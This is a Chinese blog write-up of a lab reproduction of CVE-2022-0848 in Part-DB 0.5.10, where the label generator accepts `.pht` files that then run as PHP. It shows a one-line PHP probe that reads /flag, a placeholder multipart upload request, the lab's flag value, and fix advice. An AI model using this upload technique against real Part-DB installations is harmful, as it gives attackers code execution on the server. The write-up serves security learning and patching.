当前位置: 首页 > news >正文

春秋云镜靶场漏洞复现:CVE-2022-0848 Part-DB 标签生成器 `.pht` 上传执行

环境:春秋云境“免费空间”授权实验靶场。历史实例已关闭。

1. 基本信息

项目 内容
CVE CVE-2022-0848
产品 Part-DB 0.5.10
功能 标签生成器/媒体上传
漏洞类型 危险扩展名上传导致 PHP 执行
Flag flag{74a7ec64-7c1b-49fc-90c8-1f2c55260934}

2. 原理与复现

标签生成器未限制危险扩展名,.pht 文件会被媒体目录中的 PHP 处理器执行。上传探针:

<?php echo file_get_contents('/flag'); ?>

代表性 multipart 请求:

POST /<Part-DB 标签上传接口> HTTP/1.1
Host: <Part-DB-靶场域名>
Content-Type: multipart/form-data; boundary=<boundary>filename="probe.pht"
<PHP probe>

访问媒体目录中的上传文件,响应为:

flag{74a7ec64-7c1b-49fc-90c8-1f2c55260934}

3. 修复建议与验证

固定图片扩展名白名单并重编码内容,上传目录禁止脚本解析且移出 Web 根目录。Flag 与平台记录一致,已提交并关闭;精确字段、目录和响应未保存,截图已保存到 images 目录并由平台详情页复核。

截图证据

题目详情与已攻克状态

题目状态与 Flag 验证区域

http://www.jsqmd.com/news/1400955/

相关文章:

  • 二建注册流程
  • 安卓文件同步新手指南:Syncthing for Android 的免云端直连方案
  • 店雷达推荐码优惠折扣码是什么?电商选品工具就用店雷达! - 跨境电商卖家出海
  • iOS设备机型对照表:开发、测试与交易必备的硬件识别指南
  • Zabbix Web监控实战:从服务器监控到业务感知的跨越
  • 智驾车载以太网(9)-davinci之phy
  • Spring Boot邮件发送全攻略:从配置到生产级实践
  • nvm实战指南:多版本Node.js环境管理与项目隔离
  • VGA高速PCB布局布线设计指南
  • 2026年杭州空调维修选简单到家,这些优势你必须知道 - 简单到家
  • 二叉树_堆的实现
  • 从CF模拟题看算法竞赛基本功:逻辑严谨性与边界处理
  • 花草茶代工如何选厂?2026 年品牌方关注的三个核心问题 - 品牌测评网
  • C++17新特性实战:结构化绑定、optional与variant提升代码质量
  • Spring注解驱动开发深度解析:从IoC容器机制到高级装配实践
  • UG NX 10.0 安装全攻略:从原理到实战,彻底解决许可证配置难题
  • 企业多云组网怎么搭建?完整步骤与方案对比
  • 镧:从“隐士“到现代科技的幕后支柱
  • AtCoder Beginner Contest 471 题解
  • Codex与MCP协议:AI编程助手的工具连接器实战指南
  • 统信UOS手动安装Xmind 8全攻略:解决Java依赖与中文乱码
  • Anaconda安装配置全攻略:从避坑到高效使用
  • Vget 一款网页视频下载工具
  • MPV播放器配置全攻略:用MPV_lazy懒人包避开4个坑,照抄4套场景方案
  • 商家AI合伙人:碰省钱 TapSave 如何用五大 AI Agent 重构实体店引流与分润体系
  • Grok Bot AI智能体团队:24/7自动化工作流部署与集成实践
  • AI视频诡异美学:从fofr工具拆解到可控生成实践
  • 批量更新主键排序防死锁 标准化规范(错误案例+正确案例+原理复盘)
  • ModHeader插件实战:HTTP请求头修改在Web开发调试中的六大核心应用
  • 日志审计系统构建指南:从ELK实战到安全运营中心演进